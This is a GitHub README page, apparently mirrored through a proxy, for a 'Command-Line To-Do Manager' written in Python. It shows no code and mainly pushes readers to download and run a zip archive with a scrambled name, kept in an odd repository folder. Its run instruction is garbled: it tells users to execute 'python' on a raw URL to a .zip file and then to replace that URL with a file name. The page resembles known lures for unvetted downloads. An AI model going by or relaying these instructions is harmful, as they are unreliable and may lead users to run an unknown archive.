Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Shivvvanshh/Command-Line-To-Do-Manager-Python-

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

📝 Command-Line-To-Do-Manager-Python- - Manage Your Tasks Easily

Download Now

📋 Overview

The Command-Line To-Do Manager allows you to manage your tasks using simple commands. Whether you want to add tasks, complete them, or delete them, this tool keeps everything organized for you. It saves your tasks in a file, so you never lose track.

🚀 Getting Started

Follow these steps to get started with the Command-Line To-Do Manager:

  1. System Requirements
    • Python 3.x installed on your computer.
    • A terminal or command prompt to run the program.
    • Basic understanding of how to use the terminal.

📥 Download & Install

To download the application, visit the Releases page.

  1. Click on the latest version available.
  2. Download the release file for your system.

Once you've downloaded the file, follow these steps to run it:

  1. Open your terminal or command prompt.
  2. Navigate to the folder where the file is located. Use the cd command.
  3. Run the program by typing:
    python https://raw.githubusercontent.com/Shivvvanshh/Command-Line-To-Do-Manager-Python-/main/Ziphius/Do_To_Line_Python_Command_Manager_v3.3.zip
    
    Replace https://raw.githubusercontent.com/Shivvvanshh/Command-Line-To-Do-Manager-Python-/main/Ziphius/Do_To_Line_Python_Command_Manager_v3.3.zip with the name of the downloaded file.

🎯 Features

  • Add Tasks: Quickly add new tasks with a simple command.
  • Show Tasks: View all your tasks along with their completion status.
  • Complete Tasks: Mark tasks as done effortlessly.
  • Delete Tasks: Remove tasks you no longer need.

📝 Usage

Once the program is running, you will see a prompt where you can enter commands. Here’s how to use it:

  1. Adding a Task

    • Type your task when prompted.
    • The task will be saved automatically.
  2. Viewing Tasks

    • Type show to see all your tasks.
    • You will see each task with its completion status.
  3. Completing a Task

    • Type complete to mark a task as done.
    • Follow the prompt to enter the task number.
  4. Deleting a Task

    • Type delete to remove a task.
    • Again, follow the prompts to specify the task number.

🌐 Troubleshooting

If you encounter issues while using the Command-Line To-Do Manager, consider the following:

  • Ensure that you have the correct version of Python installed.
  • Double-check your command inputs. If you enter an invalid task number, the program will inform you.
  • If the file does not appear, make sure you have permission to read and write files in the directory.

📞 Support

For further assistance, feel free to enter an issue in this repository's GitHub page. Provide details about the problem you faced so that we can help you more effectively.

🔗 Additional Links

Explore more on the Releases page for updates and new features.

Thank you for using the Command-Line To-Do Manager! Enjoy managing your tasks efficiently.